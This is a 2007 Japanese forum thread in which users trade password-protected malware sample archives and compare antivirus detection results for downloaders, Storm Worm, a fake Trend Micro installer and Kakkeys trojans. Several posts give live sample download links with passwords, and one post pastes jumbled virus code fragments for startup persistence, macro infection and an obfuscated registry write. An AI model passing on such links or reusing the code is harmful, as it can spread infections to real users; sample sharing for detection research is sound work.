detected: Trojan program Trojan-Downloader.JS.Agent.id File: tane_uljp00110.zip/Script/7/haha.js
detected: Trojan program Trojan-Downloader.JS.Agent.nd File: tane_uljp00110.zip/Script/8/vip.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.li File: tane_uljp00110.zip/Script/9/sys614.js//JSPack

651 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:10:03
はえーな…。

652 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:21:43
流石カスペだな・・・

AntiVirはどうかな?

653 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:23:07
>>646
VIRUS TOTALで結果見てるけど
全ベンダでヒューリスティック検知できたのはind.htmlがwebwasher、stats.htmlがAntivirとwebwasherのみ。
Psyme亜種さえ検知できてない。

スクリプト系はシグネチャで対応するほかはなく ヒューリスティックは無力と言っていいと思う。

654 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:26:37
>>646
キラー
D:\virus\tane_uljp00110\Script\3\sys614.js
Trojan.DL.JS.Agent.lll
D:\virus\tane_uljp00110\Script\4\vip.htm
Trojan.DL.VBS.Agent.xhh
D:\virus\tane_uljp00110\Script\6\haha.js
Trojan.DL.JS.Agent.llm
D:\virus\tane_uljp00110\Script\7\haha.js
Trojan.DL.JS.THunder.i

655 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:29:11
NODは全滅でした><

656 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:47:05
>>646
Norton Internet Security 2007
北米に贈っておきました

657 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:48:13
>>655
NODだけじゃない Avast AVG McAfee Nortonも全滅
MsとBITがかろうじて1つ
げに恐ろしきはJS malware

658 :名無しさん@お腹いっぱい。:2007/08/25(土) 20:57:08
殆ど無害だから検知するだけ煩わしい。

659 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:02:01
つ ROM

660 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:03:02
>>658
そう思うなら踏んでみろよw

661 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:10:28
信頼できるサイト以外は、JS以外は無効にするのが原則。
ただし、ずる賢いサイトは、サイトを表示するには、JavaScriptを有効にしてください。と表示されたり、真っ白だったりする。
で、試しに一時的に有効にすると攻撃。

662 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:21:11
今信頼できるサイトって定義が崩れかけてるよな。
投資信託の会社のホームページに不正JSが仕掛けられてるなんて
普通の人は想像もしないだろう。
http://www.morningstar.co.jp/info/news070730.htm

663 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:25:33
それにしては、2ちゃんねるは堅牢だな。

664 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:37:19
2ちゃんハックは難しいんだろうな

665 :名無しさん@お腹いっぱい。:2007/08/25(土) 22:02:27
http://strawberry.secret.jp/kemo.zip

666 :名無しさん@お腹いっぱい。:2007/08/25(土) 22:08:29
>>646
ウイルスバスター 2007(4.672.09)
D:\MW\tane_uljp00110\Script\0\page.htm : Possible_EncScr
D:\MW\tane_uljp00110\Script\3\sys614.js : JS_DLOADER.GWY
D:\MW\tane_uljp00110\Script\4\vip.htm : VBS_DLOADER.IDP
D:\MW\tane_uljp00110\Script\6\haha.js : JS_DLOADER.TAE
D:\MW\tane_uljp00110\Script\7\haha.js : Possible_EncScr
検体送付しました

667 :名無しさん@お腹いっぱい。:2007/08/26(日) 03:36:24
>>646
AntiVir PE Classic 6.39.1.44
\Script\2\stats.htm
[DETECTION] Contains suspicious code HEUR/Exploit.HTML
\Script\3\sys614.js
[DETECTION] Contains signature of the Java script virus JS/Dldr.Agent.LA
\Script\4\vip.htm
[DETECTION] Contains signature of the Java script virus JS/Dldr.Agent.LC
\Script\7\haha.js
[DETECTION] Contains signature of the Java script virus JS/Agent.EN
\Script\9\sys614.js
[DETECTION] Is the Trojan horse TR/Dldr.Psyme.LI

ヒューリスティックで検出した2と残りは送っておいた。

668 :名無しさん@お腹いっぱい。:2007/08/26(日) 05:49:15
ほう、Aviraも5個残ってるな。
それにしてもウィルスキラーはドラえもん、キティちゃん、北斗の拳とか
恥ずかしいけど、実力はかなりあるんじゃないか?
今までソースネクストと比べられる事が多かったけど

669 :名無しさん@お腹いっぱい。:2007/08/26(日) 09:12:09
>>668
農奴32乙。

670 :名無しさん@お腹いっぱい。:2007/08/26(日) 10:12:11
                   ヽ  ヘ ノレ,  
       ∧_∧      ヽ(。、::。.::・'゜・' )〆
      (´Д`*.)    / ̄ ̄ヽ::。 ).。::  θ) ←>1
        i i⌒\__ノ     ノ::・'゜。'゜ )ゝ
        ヽヽ ヽ    / /。、 ::。 )ヽ
         )) )-─/ /’ /Υ/ γ\ヾ
         // /  //  /  // /\    \
        ((__ノ  // /   (_(_,ノ  )    )
            // ノ       / / /
            |_|_/        / / /
                    (  (  <
                     \ \ \
                     (⌒_(⌒__ヽ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
???????

671 :名無しさん@お腹いっぱい。:2007/08/26(日) 10:16:31
キチガイ禁止

672 :名無しさん@お腹いっぱい。:2007/08/26(日) 10:23:34
      ━┓
      ┏┛
━┓   _・    .━┓
┏┛ / ―\   ┏┛
・ /ノ  (●)\  ・
. | (●)   ⌒)\
. |   (__ノ ̄  |
  \        /
    \     _ノ
    /´     `\
     |       |
     |       |


673 :名無しさん@お腹いっぱい。:2007/08/26(日) 10:56:18
ワラタ

674 :名無しさん@お腹いっぱい。:2007/08/26(日) 11:08:27
http://www5.uploader.jp/dl/tane/tane_uljp00111.zip.html
pass Packed.13

http://www.symantec.com/enterprise/security_response/weblog/2007/08/the_new_peacomm_infection_tech.html

これ youtube偽装サイトからGET
.txtに変換してあるけど本来は.exe

675 :名無しさん@お腹いっぱい。:2007/08/26(日) 11:22:17
>>674
カスペ 6
Email-Worm.Win32.Zhelatin.hi : C:\Temp\video.txt

676 :名無しさん@お腹いっぱい。:2007/08/26(日) 11:42:52
メールで頻繁に来るecard.exeと同じ奴かね。

677 :名無しさん@お腹いっぱい。:2007/08/26(日) 11:51:55
そうね いわゆるStorm Worm
GETしたサイトは多分Mpack使ってる ↓これとほぼ同じ感じだった
http://www.itmedia.co.jp/news/articles/0706/29/news022.html

678 :名無しさん@お腹いっぱい。:2007/08/26(日) 12:02:03
>>674
Avira AntiVir PersonalEdition Classic

--> video.txt
[DETECTION] Contains signature of the worm WORM/Zhelatin.Gen

679 :名無しさん@お腹いっぱい。:2007/08/26(日) 12:07:53
>>674
これ怖いな、拡張子まで偽装してる
うっかりクリックしてもおかしくないな

680 :674:2007/08/26(日) 12:13:27
いや もともと.exeだったのを自分で.txtに変えただけ
.exeのままではなぜかエラーがでて圧縮できなかったんで変えた
.txtクリックしてもtxt形式のバイナリ画面でるだけ

681 :名無しさん@お腹いっぱい。:2007/08/26(日) 12:57:34
txtでも、別ファイルで1行バッチなどでコード書けば、拡張子は簡単にexeに変わる
バイナリのtxt自体は怖くないが、exeに変えられたときが怖い

拡張子を限定してスキャンするのはちょっと危険かな。

682 :名無しさん@お腹いっぱい。:2007/08/26(日) 13:10:54
>>674
ウイルスバスター 2007(4.672.16)
Suspicious_File : D:\MW\video.txt
ヒューリスティック検出なので検体送信完了

683 :名無しさん@お腹いっぱい。:2007/08/26(日) 13:16:43
>>674
McAfeeスルーヽ(`Д´)ノ

eCard系はMcAfeeにしては対応早いんだけど
他所と比べるとどうもワンテンポ遅いんだよね…

684 :名無しさん@お腹いっぱい。:2007/08/26(日) 14:34:10
>>674
Risingに贈呈しました

685 :名無しさん@お腹いっぱい。:2007/08/26(日) 15:04:12
eCard(ゼラチン)、メールで山ほど来るよな。
一見テキスト形式でYouTubeやグリーティングカードへのリンクだけど
実際はIP書いてあって、アクセスするとexeが落ちてくる。
感染したPCが頒布してるんだろうな。
今まで1ダース以上拾っているけど、
バイナリ比較しても微妙に異なるので
ある程度はミューテーションする模様。
Packerはオリジナルっぽいね。

686 :名無しさん@お腹いっぱい。:2007/08/26(日) 15:06:33
あとアクセスした先、いきなりexeが置いてあるわけではなく
脆弱性を突くためのスクリプトが難読化されてるんだけど
スクリプト解読していくとカスペへの罵りが出てきて笑った。

687 :名無しさん@お腹いっぱい。:2007/08/26(日) 15:06:56
187 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/08/23(木) 14:12:01
TP13 forever(Symantec Blog,07/8/22,英語)

Trojan.Packer13(仮称、シマンテック命名)について、2007年でもっとも広く広まったウイルスに関与しているが、ヒューリスティックでも検出がおぼつかない。
関連したトロイは有名なTrojan.Peacommなど多数。

TP13の特徴は、不明なパッカーでパッキングされているトロイを見つけるヒューリスティックのセットを有する。
TP13は広く使われているようだ。また、20分ごとに悪意のあるファイルを頻繁にパックし、1日に最大3回までTP13自体をアップデートできる。
さらに、AVをだますアンチエミュレーション技術を有する。
Trojan.Peacommなどのポリモーフィック・ウイルスは、パフォーマンスの問題(AVスキャン時にポリモーフィックか否かを判定するのにそんなに多大な時間を掛けられない)や
AVベンダーが誤検出の多発をいやがる傾向から検出することが困難である。

新しい脅威が出現すると、アナリストは検知しようとするが、戦いは永遠に終わらない。

http://www.symantec.com/enterprise/security_response/weblog/2007/08/tp13_forever.html

688 :684:2007/08/26(日) 20:30:51
>>674
   1.文件名:video.txt
   病毒名:Worm.Mail.Zhelatin.aiu

689 :名無しさん@お腹いっぱい。:2007/08/26(日) 23:57:05
お聞きしたいのですが、ここのあるスレに投稿
したらIPアドレスが直接表示されてたのですが
大丈夫でしょうか?ダイアルアッブなので毎回アドは変わりますが。
ちなみそのスレはすぐ消えました。

690 :名無しさん@お腹いっぱい。:2007/08/27(月) 00:16:31
>>689
もうおしまいだ。

691 :名無しさん@お腹いっぱい。:2007/08/27(月) 00:39:45
おしまいって?
OSの再インストール?
毎回IP変わるから大丈夫でしょう?

692 :名無しさん@お腹いっぱい。:2007/08/27(月) 02:30:05
IPアドレスは代わってもトロイが情報ばら撒くには問題ないよな

693 :名無しさん@お腹いっぱい。:2007/08/27(月) 03:18:01
まぁOSの再インストールなんて慣れちまえばなんてことはない。
みんなが通ってる道だ。早く慣れることだな。

694 :名無しさん@お腹いっぱい。:2007/08/27(月) 06:33:40
ありがとう。
ガク(。、)

695 :名無しさん@お腹いっぱい。:2007/08/27(月) 07:18:37
最近のPCだとCドラの設定丸ごとDドラに保存する機能があるだろ
あれを使えば初心者でもリカバリなんて簡単に出来るんだが

それともリカバリ嫌いの奴って古いPC使いの初心者か?
古いPCだと何が一番邪魔臭いかってWindowsの再うp立てだな
SP2を最初から全部入れると数時間も掛かるから
リカバリを敬遠したくなるのも分る希ガス

696 :名無しさん@お腹いっぱい。:2007/08/27(月) 10:17:12
まさか2ちゃんの狼というオチじゃないよね

697 :654:2007/08/27(月) 12:14:00
>>646
   1.文件名:page.htm
   不是病毒

   2.文件名:ind.html
   病毒名:Trojan.DL.JS.Agent.llv

   3.文件名:stats.htm
   不是病毒

   4.文件名:vip.htm
   不是病毒

   5.文件名:iexp.htm
   病毒名:Trojan.DL.JS.Agent.llw

   6.文件名:vip.htm
   病毒名:Trojan.DL.JS.Agent.llx

   7.文件名:sys614.js
   病毒名:Trojan.DL.JS.Agent.lly

698 :名無しさん@お腹いっぱい。:2007/08/27(月) 19:01:55
>>694です。
XPで、たいしてデータ、ソフト入ってないんで再インストでもいいのですが、
時間と更新のやり直しがめんどい。
一応Trojan2種類をセキュリティソフトの検査で検出したのでそのままで。
1ヶ月前は検出しなかったのだけど〜


699 :名無しさん@お腹いっぱい。:2007/08/27(月) 22:47:32
>>674
txt -> exeにしたらAvastが反応した
検出名はWin32:Tibs-BEL [Trj]
拡張子がtxtだとスキャンしてくれないみたい

700 :名無しさん@お腹いっぱい。:2007/08/27(月) 22:51:59
>>699
Avast!はよくわからんが、設定画面ですべてスキャンするにしたら、検出するんじゃないか?

701 :名無しさん@お腹いっぱい。:2007/08/28(火) 21:26:31
http://ime.nu/forum.cheatengine.org/download.php?id=12677

702 :名無しさん@お腹いっぱい。:2007/08/28(火) 23:19:51
CheatEngineね…。
>>605

703 :名無しさん@お腹いっぱい。:2007/09/02(日) 20:40:19
検体URL
http://www5.uploader.jp/dl/tane/tane_uljp00115.zip.html

ダウンロード/解凍パス
virus

704 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:03:17
>>703
VirusTotal
http://www.virustotal.com/resultado.html?9fcb47ee48ba471250d4565bd57d987a

705 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:08:47
>>703Kaspersky
ダウンロードしようとしたら
Home / Viruses / Virus Encyclopedia / Malware Descriptions / Classic Viruses / File and Boot Viruses
Password-protected-EXE
Detection added Dec 31 1969 22:59 GMT
Behavior Virus



706 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:24:30
>>705
d

707 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:30:28
バスタ
CrackingApps Keygen

708 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:32:58
こういうの見るとNODのヒューリスティックってPanda以下かって思う
結構あんだよね、こういうの

709 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:33:04
NOD32 v2.7はスルー orz

710 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:33:31
>>703

Antivir

'TR/Agent.RIR.135 [TR/Agent.RIR.135]'


711 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:34:01
ゴミ屑を検知しても意味ないw

712 :名無しさん@お腹いっぱい。:2007/09/02(日) 21:35:21

Keygenの真贋確認させてる

713 :名無しさん@お腹いっぱい。:2007/09/03(月) 07:12:45
>>703
AVGスルー
検体送りました

714 :名無しさん@お腹いっぱい。:2007/09/03(月) 08:58:55
>>703
McAfeeスルーヽ(`Д´)ノ

715 :名無しさん@お腹いっぱい。:2007/09/03(月) 09:45:44
>>708
誤検知も含めてだけど、パンダはヒューステリックが優秀だと思う

716 :名無しさん@お腹いっぱい。:2007/09/03(月) 15:51:04
>>703
Rising解析結果
   1.文件名:Keygen1.exe
   不是病毒

717 :名無しさん@お腹いっぱい。:2007/09/03(月) 17:42:28
誤検知か?

718 :名無しさん@お腹いっぱい。:2007/09/03(月) 18:18:21
割れ厨うぜぇ。キージェネの鑑定とかは他所でやれや。

719 :名無しさん@お腹いっぱい。:2007/09/03(月) 19:38:24
キージェネはもうだめぽ。
悪い奴がウイルスを仕込むのに最適の餌食。

ソフトウェアの製造元ーがウイルスを混入してばらまいているかもしれない。
また、あえて、ベンダーが特殊なパッカーでAVで鳴るようなフェイクのジェネを大量にばらまいて
割れザーを混乱させているかもしれない。これは何の罪にもならない。

おわっとるよ。

720 :名無しさん@お腹いっぱい。:2007/09/03(月) 20:30:32
割れ厨の主張はそれで終わりか?早く死ねよ。

721 :名無しさん@お腹いっぱい。:2007/09/03(月) 22:18:21
バスター優秀じゃん

722 :名無しさん@お腹いっぱい。:2007/09/04(火) 00:28:41
>>703
シマンテックに検体送付しました。

723 :名無しさん@お腹いっぱい。:2007/09/05(水) 00:33:59
ニュイルスとか検体配布するサイト作ったら需要ある?

724 :名無しさん@お腹いっぱい。:2007/09/05(水) 00:37:09
>>723
それは悪用されるんじゃまいか?
下手したら捕まるんじゃないか?
なんたらかんたら幇助で

725 :名無しさん@お腹いっぱい。:2007/09/05(水) 00:43:17
なんたらかんたら幇助わらた

726 :名無しさん@お腹いっぱい。:2007/09/05(水) 11:48:37
でもZIPにパスつければ

727 :名無しさん@お腹いっぱい。:2007/09/05(水) 21:22:04
http://www5.uploader.jp/dl/tane/tane_uljp00117.zip.html
pass 偽バスター

〜トレンドマイクロのニセサイトへ接続し不正なプログラムをダウンロード
 させるスパムメールが発見〜

----ウイルス情報は下記をご覧ください----
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPER.CNH

ニセの警告メールでトレンドマイクロのニセサイトにおびき寄せ、
不正なプログラム をダウンロードさせる手口が確認されています。ご注意ください。
  ↑
ブツはこれ GETしたサイトはこれ Firefoxで踏んだら 思いっきり偽装サイト警告でたけどw
               ↓
http://www5.uploader.jp/dl/tane/tane_uljp00118.jpg.html

728 :名無しさん@お腹いっぱい。:2007/09/05(水) 21:28:47
>>727
d。
カスペ7

detected: Trojan program Trojan-Dropper.Win32.Agent.btc File: C:\Users\***\Desktop\tane_uljp00117.zip/TMASInstall_EN_US.exe

118のサイトは全く同じだな。英語だから日本人は警戒するが、


あと、パスワードに、漢字はやめて。w

729 :727:2007/09/05(水) 21:51:48
http://www5.uploader.jp/dl/tane/tane_uljp00119.jpg.html
警告画面もうpしてみた

730 :名無しさん@お腹いっぱい。:2007/09/06(木) 03:19:11
>>727
Avira AntiVir PersonalEdition Classic

--> TMASInstall_EN_US.exe
[DETECTION] Is the Trojan horse TR/Drop.Agent.btc.1

731 :名無しさん@お腹いっぱい。:2007/09/06(木) 09:27:13
誰か谷口ウイルスの検体持ってる人いませんか?
持ってたらUPしてほしい・・・

732 :名無しさん@お腹いっぱい。:2007/09/06(木) 09:35:10
なんだ、お前の会社こんなのもゲットできねーのか
まぁ頑張れ弱小w

733 :名無しさん@お腹いっぱい。:2007/09/06(木) 09:52:14
頑張れシマンテック

734 :名無しさん@お腹いっぱい。:2007/09/06(木) 10:26:36
>>727
McAfeeスルーヽ(`Д´)ノ
そしてでかすぎて送れねぇ orz
いまどき3MBはねえだろ、常識的に考えて…

735 :名無しさん@お腹いっぱい。:2007/09/06(木) 11:18:53
>727
お疲れ様です。
avast! Antivirus未検出の為
提出しておきました。


>734
NODも大き過ぎて検体送れないです・・・(未検出でした


736 :名無しさん@お腹いっぱい。:2007/09/06(木) 15:33:35
>>727
その検体のどこがウイルスなんだ?
実行してみてもあやしい動きなしのただのTrend Micro製のアンチスパイウェア
ソフトじゃん

737 :名無しさん@お腹いっぱい。:2007/09/06(木) 15:56:28
ウイルスバスター自体がウイル ry)

738 :名無しさん@お腹いっぱい。:2007/09/06(木) 15:59:14
>>736
ドロッパーだよ
馬鹿は黙ってろ

739 :名無しさん@お腹いっぱい。:2007/09/06(木) 16:23:15
谷口はまだ失敗作だと聞いたが。

740 :名無しさん@お腹いっぱい。:2007/09/06(木) 17:33:11
>>738
でも何にも落ちてこない。
再起動しても変化なし。あやしいプロセスもないし通信もないし

741 :名無しさん@お腹いっぱい。:2007/09/06(木) 17:35:43
怪しいプロセスもない。
→ルートキットの場合は見えないし、エクスプローラ、Dirでは見えない。

通信もない。
→SVCHOST.EXEや他のプロセスなどで通信することがある。

742 :名無しさん@お腹いっぱい。:2007/09/06(木) 18:01:09
ルーキット検出系ツール使っても見つからなかった。
AntiSpyは問題なく使えます。
マジでトロイなのかこれ?

743 :名無しさん@お腹いっぱい。:2007/09/06(木) 18:10:19
NOD対応したじゃん

744 :名無しさん@お腹いっぱい。:2007/09/06(木) 18:20:23
>>742
お前の知能がしょぼかっただけだよ
いい加減黙ってくれないか?
ここはアンチウイルスが検出するかしないかのスレなんで

745 :名無しさん@お腹いっぱい。:2007/09/06(木) 18:52:35
【罠】トレンドマイクロさんがウイルス対策ソフトただで配ってるらしいアルよー
http://news23.2ch.net/test/read.cgi/news/1189064444/

746 :名無しさん@お腹いっぱい。:2007/09/08(土) 18:25:52
ttp://www.dotup.org/uploda/www.dotup.org0748.rar.html
virus

747 :名無しさん@お腹いっぱい。:2007/09/08(土) 18:57:56
>>746
McAfee
2.exe: Kakkeys

寂しいのう…

748 :名無しさん@お腹いっぱい。:2007/09/08(土) 19:15:02
>>746
AntiVirに提出したらb.exeをウイルスではないと言ってきた

749 :名無しさん@お腹いっぱい。:2007/09/08(土) 19:29:03
>>746
d。
カスペ7
7/14

detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe

残り7つは飯食って風呂入ってオナってから検体提出。
これは全部ウイルスかもしれんね。

750 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:11:06
>>746
Hello,

1.exe_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support

カスペのアナリストでは、毒なし。

751 :749:2007/09/08(土) 21:32:00
>>746
今は、8/14
d.exe追加

detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File: 3.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File: 6.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 8.exe
detected: Trojan program Trojan.Win32.Delf.zu File: 9.exe
detected: Trojan program Trojan.Win32.Haradong.ar File: c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: e.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File: www.dotup.org0748\a\d.exe

752 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:37:45
>>746
ウイルスバスター2007(CPR)
D:\SandBox\a\2.exe: TROJ_Generic
D:\SandBox\a\3.exe: TSPY_KAKKEYS.F
D:\SandBox\a\6.exe: TROJ_TANIGU.A
D:\SandBox\a\8.exe: TROJ_Generic
D:\SandBox\a\c.exe: TROJ_HARADONG.BD
D:\SandBox\a\e.exe: TROJ_KILLFILE.DT
検出漏れは送っておきました

753 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:43:13
>>746
Avira AntiVir PersonalEdition Classic

--> a/3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.C.1
--> a/8.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU
--> a/9.exe
[DETECTION] Is the Trojan horse TR/Delf.ZU.5
--> a/AntiLo/1/Data_1.exe
[DETECTION] Is the Trojan horse TR/Delf.UN.1
--> a/AntiLo/2/Data_1.exe
[DETECTION] Is the Trojan horse TR/PSW.Delf.CB
--> a/AntiLo/3/Data_1.exe
[DETECTION] Is the Trojan horse TR/Dldr.Agent.bym
--> a/c.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/d.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
--> a/e.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen

残ったのはexe8個、antidojin.rb3個

754 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:50:28
>>746 1.exeとa.exeは白判定

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Saturday, September 08, 2007 9:44 PM
To:
Subject: RE: Please Inspect This File. A New Malware? [KLAB-2871541]

Hello,

a.exe_

No malicious code was found in this file.

Please quote all when answering.

--
Best regards, Vladimir Lebedev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

755 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:52:17
>>752
6は谷口かーーーーーーーーーーーーーーー!

756 :名無しさん@お腹いっぱい。:2007/09/08(土) 21:56:54
>>746

ノートン
2.exe  Trojan.Kakkeys.C
3.exe  Trojan.Kakkeys.C
8.exe  Trojan Horse
9.exe  Trojan Horse
c.exe  Trojan Horse
d.exe  Trojan Horse
e.exe  Trojan Horse
他、シマンテックに検体送付しました。

757 :名無しさん@お腹いっぱい。:2007/09/08(土) 22:01:05
不発といわれているがシェル書き換えでexplorer起動不能にはなるみたいね
Kakkeys系に分類されるのは意外なキモス

758 :名無しさん@お腹いっぱい。:2007/09/08(土) 22:07:39
ウイルスキラー
D:\virus\www.dotup.org0748\a\8.exe
Trojan.Delf.rky
D:\virus\www.dotup.org0748\a\9.exe
Trojan.Win32.Delf.rtl

2,3,7以外Risingに送付済み

759 :名無しさん@お腹いっぱい。:2007/09/08(土) 22:35:21
>>746
1.exe ttp://www.virustotal.com/resultado.html?4dc7a17540711316dd6846685b6317f4
2.exe ttp://www.virustotal.com/resultado.html?01a3ab6db5595076b6f05ba4a40e0041
3.exe ttp://www.virustotal.com/resultado.html?8a278a39a4593daedbdba6b3f368bcb1
4.exe ttp://www.virustotal.com/resultado.html?ebd7b8afdb61e7ab70149572772a9e27
5.exe ttp://www.virustotal.com/resultado.html?652444e7507d28bf96eecca1437da88b
6.exe ttp://www.virustotal.com/resultado.html?d0ae2694225784f87a51d57a2d094970
7.exe ttp://www.virustotal.com/resultado.html?ef965020bfb44e0229e4e133ec291f14
8.exe ttp://www.virustotal.com/resultado.html?c67665c25e9465ae776d4ba8961b3f9b
9.exe ttp://www.virustotal.com/resultado.html?076b171912c47422d0f53c32f6441f74
a.exe ttp://www.virustotal.com/resultado.html?fedb2c618ed41f35cf8e1e23af31341e
b.exe ttp://www.virustotal.com/resultado.html?9eafd4c66231aca0a652daaaee9ec527
c.exe ttp://www.virustotal.com/resultado.html?bde83136ff19666c127518991f41303c
d.exe ttp://www.virustotal.com/resultado.html?d09d3ea4f731e9af764455177a0c6fe0
e.exe ttp://www.virustotal.com/resultado.html?5cd039c749db44cfd29ee113a1193392

760 :名無しさん@お腹いっぱい。:2007/09/08(土) 23:58:51
>746
お疲れ様です!!!。

塊のままスキャンした結果です。
ttp://www7.uploader.jp/dl/maru/maru_uljp00072.jpg.html
ttp://www7.uploader.jp/dl/maru/maru_uljp00073.jpg.html


761 :名無しさん@お腹いっぱい。:2007/09/09(日) 00:36:19
>>746
まだ送ってないのにキングが7つほど検出したのでビックリ

762 :名無しさん@お腹いっぱい。:2007/09/09(日) 00:46:22
>>746
NOD32 6つ

時間 モジュール 対象 名前
2007/09/09 0:36:56 AMON ファイル Y:\a\c.exe Win32/Haradong.AR トロイ
2007/09/09 0:36:55 AMON ファイル Y:\a\e.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:54 AMON ファイル Y:\a\d.exe Win32/Haradong トロイ の亜種
2007/09/09 0:36:53 AMON ファイル Y:\a\9.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:51 AMON ファイル Y:\a\8.exe ウイルスの可能性 : NewHeur_PE ウイルス (シグネチャなしで検知)
2007/09/09 0:36:48 AMON ファイル Y:\a\3.exe Win32/Kakkeys.C トロイ

カスペとの違い
NOD32未検出・・・2.exeと6.exe
カスペ未検出・・・・d.exe

763 :名無しさん@お腹いっぱい。:2007/09/09(日) 01:10:15
>>727
NOD32 1つ
時間 モジュール 対象 名前
2007/09/09 1:07:14 AMON ファイル Y:\tane_uljp00117\TMASInstall_EN_US.exe Win32/TrojanDropper.Agent.BTC トロイ


764 :名無しさん@お腹いっぱい。:2007/09/09(日) 03:23:21
>>746
カスペ7
9/14(うち2は白、待ちは3)

1.exe: No malicious code was found.
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\2.exe//Exerb
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.c File:a\3.exe//Exerb
4.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey?
5.exe 解析待ち(Ewido,,Prev1で陽性反応) Kakkey ?
detected: Trojan program Trojan-Spy.Ruby.Kakkeys.t File:a\6.exe
detected: Trojan program Trojan.Win32.VB.aqk File:a\7.exe (NEW)
detected: Trojan program Trojan.Win32.Delf.zu File:a\8.exe
detected: Trojan program Trojan.Win32.Delf.zu File:a\9.exe
a.exe No maicious code was found
b.exe 送るの忘れてたwww。俺ワロス。
detected: Trojan program Trojan.Win32.Haradong.ar File:a\c.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\d.exe
detected: Trojan program Trojan.Win32.KillFiles.ki File:a\e.exe


もう一回送るか?(4,5,b)
7.exeは返事が来ないけれど、いつの間にか検知という悲しいパターン。
サンキューメールがもらえないってのは、(TOT)
時間がかかるね、日ロ関係を悪化させない程度にフォローしてみるか?
でかいけれど、萌え動画が入っているのか?
ロシア人、日本の検体に失笑。

765 :名無しさん@お腹いっぱい。:2007/09/09(日) 04:17:02
おまいらny系だと食いつきいいなあw

766 :名無しさん@お腹いっぱい。:2007/09/09(日) 10:07:24
P2Pなんジョングってもないしテーハミンとも思わグックない

767 :名無しさん@お腹いっぱい。:2007/09/09(日) 11:18:03
AVG IS
2.exe Logger.kakkeys.c
6.exe Virus identified Worm/Generic.DHG
7.exe Trojan.Regspy
8.exe Trojan horse Generic3.FGC
9.exe Trojan horse Generic5.QET
c.exe Virus identified Worm/VB.BRG
d.exe Virus identified Worm/VB.CEM
e.exe Trojan horse Generic7.ATT


768 :名無しさん@お腹いっぱい。:2007/09/09(日) 12:40:23
>>762
「〜 の亜種」
もNewHeur_PEとおなじでヒューリスティックで検知だったかと。

